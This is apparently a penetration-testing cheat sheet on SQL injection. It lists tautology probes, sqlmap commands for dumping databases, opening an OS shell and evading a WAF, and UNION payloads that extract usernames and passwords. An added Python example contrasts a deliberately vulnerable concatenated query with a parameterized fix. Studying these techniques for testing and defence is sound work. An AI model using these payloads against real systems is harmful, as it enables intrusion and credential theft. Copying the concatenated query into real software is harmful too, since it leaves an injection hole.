
# SQL Injection

## Detection

Test with single quotes and boolean conditions: a syntax error or changed response confirms the injection point.

```sql
' OR '1'='1
' OR 1=1--
") OR ("1"="1
') OR ('1'='1
```
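Why these probes change the response, and what the fix looks like from the application side, as an added example that is not part of the original page: a lookup that splices user input into the SQL text beside the same lookup with a bound parameter, run against a throwaway in-memory SQLite table (the table, rows and function names are constructed for this illustration). Against the concatenated query the tautology payloads above return every row and a lone quote raises a syntax error; against the parameterized query the same input is just a value that matches nothing.

```python
import sqlite3

# Constructed sample data: an in-memory throwaway table, not a real system.
SEED_USERS = [("alice", "s3cr3t"), ("bob", "hunter2"), ("carol", "pa55")]


def make_db() -> sqlite3.Connection:
    """Create an in-memory SQLite database with a small users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SEED_USERS)
    return conn


def lookup_concat(conn: sqlite3.Connection, username: str) -> list[str]:
    """VULNERABLE (kept here only to show the contrast): the input is
    spliced into the SQL text, so a quote in the input closes the string
    literal and whatever follows is parsed as SQL."""
    sql = f"SELECT username FROM users WHERE username = '{username}'"
    try:
        return [row[0] for row in conn.execute(sql)]
    except sqlite3.OperationalError as exc:
        # A database syntax error surfacing to the caller is the
        # "changed response" that confirms an injection point.
        return [f"ERROR: {exc}"]


def lookup_param(conn: sqlite3.Connection, username: str) -> list[str]:
    """HARDENED: a bound parameter is always treated as a value, never as
    SQL, so quotes and keywords in the input have no syntactic effect."""
    sql = "SELECT username FROM users WHERE username = ?"
    return [row[0] for row in conn.execute(sql, (username,))]


if __name__ == "__main__":
    db = make_db()
    for payload in ["alice", "' OR '1'='1", "' OR 1=1--", "'"]:
        print(repr(payload), "concat ->", lookup_concat(db, payload),
              "| param ->", lookup_param(db, payload))
```

The parameterized version is the mitigation; the concatenated one exists only so the difference in behaviour is visible side by side. The same contrast holds for any driver that supports placeholders (`?`, `%s`, `:name`), and for ORMs as long as raw string formatting is never used to build the statement.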

## sqlmap

Let sqlmap automate discovery and extraction: use -r with a saved Burp request for the cleanest results.

```bash
# Basic
sqlmap -u "http://<IP>/page?id=1" --batch

# POST
sqlmap -u "http://<IP>/login" --data="user=admin&pass=test" --batch

# From Burp request
sqlmap -r request.txt --batch

# Dump
sqlmap -u "http://<IP>/page?id=1" --dbs --batch
sqlmap -u "http://<IP>/page?id=1" -D <db> --tables --batch
sqlmap -u "http://<IP>/page?id=1" -D <db> -T <table> --dump --batch

# OS shell
sqlmap -u "http://<IP>/page?id=1" --os-shell --batch

# WAF bypass
sqlmap -u "http://<IP>/page?id=1" --tamper=space2comment --batch
```

## Manual Union-Based

Determine the column count with ORDER BY, then use UNION SELECT to extract data: null-fill until the count matches.

```sql
ORDER BY 1--
ORDER BY 2--
UNION SELECT NULL,NULL,NULL--
UNION SELECT username,password,NULL FROM users--
```